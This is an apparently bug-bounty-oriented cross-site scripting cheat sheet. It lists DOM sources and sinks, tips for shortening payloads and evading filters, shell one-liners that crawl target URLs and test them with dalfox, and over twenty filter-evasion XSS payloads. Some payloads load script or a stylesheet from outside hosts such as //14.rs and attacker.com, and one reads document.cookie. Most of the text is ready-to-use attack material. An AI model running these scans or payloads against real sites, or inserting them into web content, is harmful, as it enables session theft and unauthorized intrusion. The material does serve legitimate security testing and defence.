- Credits
- Somedev Sangwan for the awesome tips and tricks.
- domxsswiki for the awesome list of sinks and sources.
- Sources
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
- Sinks
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
-
Q: How to identify sinks and sources?
-
A: Use the browser extension Untrusted Types by filedescriptor.
-
Tips and Tricks @s0md3v
- http(s):// can be shortened to // or /\ or \.
- document.cookie can be shortened to cookie. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
- You can use // to close a tag instead of >.
- I have found that confirm is the least detected pop-up function so stop using alert.
- Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
- The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)
- Scanning XSS from host / from @cihanmehmet
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt- Automating XSS using Dalfox, Gf and Waybackurls / from @theinfosecguy
cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)- XSS without Gf / from @HacktifyS
waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done- The list-style-image propery
<style> li {list-style-image: url("javascript:confirm(1)");}
- Low source
<img lowsrc="javascript:confirm(1)">
- Using the transition event
<style>:target {color: red;}</style>
<div id=x style="transition: color 1s" ontransitionstart=confirm(1)></div>
- HTML entities
<img src=javascript:confirm("xss") />
- Grave accent obfuscation
<img src=`javascript:confirm(1)`>
- Malformed anchor tag
\<a onmouseover="confirm(document.cookie)"\>click\</a\>
- Malformed IMG tags
<img """><script>confirm(1)</script"\>
- Using the fromCharCode() method
<img src=javascript:confirm(String.fromCharCode(88,83,83))>
- Exploiting the bgsound tag
<bgsound src="javascript:confirm(1);">
- Remote style sheet
<link rel="stylesheet" href="http://attacker.com/xss.css" />
- Inside the meta tag content
<meta http-equiv="refresh" content="0;url=javascript:confirm(1);">
- iFrame source
<iframe src="javascript:confirm(1);"></iframe>
- Style attribute
<div style="background-image: url(javascript:confirm(1))"></div>
- Embedded newline
<img src="javªascript:confirm(1)" />
- Embedded tab
<img src="jav ascript:confirm(1)" />
- Default source attribute
<img src=# onmouseover="confirm(1)" />
<img src= onmouseover="confirm(1)" />
- On error alert
<img src=/ onerror="confirm(1)" />
- Decimal HTML character references
<img src=javascript:alert('XSS')>
- Body tag
<body onload=confirm(1)>
- Image dynsrc attribute
<img dynsrc="javascript:confirm(1)">
- Input of type image
<input type="image" src="javascript:confirm(1)">
- Half open HTML/Javascript
<img src="`<javascript:confirm`>(1)"
- Extraneous open brackets
<<script> confirm(1) //\<</script>
- Blogs
- XSS test beds and challenges
- Amazing tools
- XSS weaponized payloads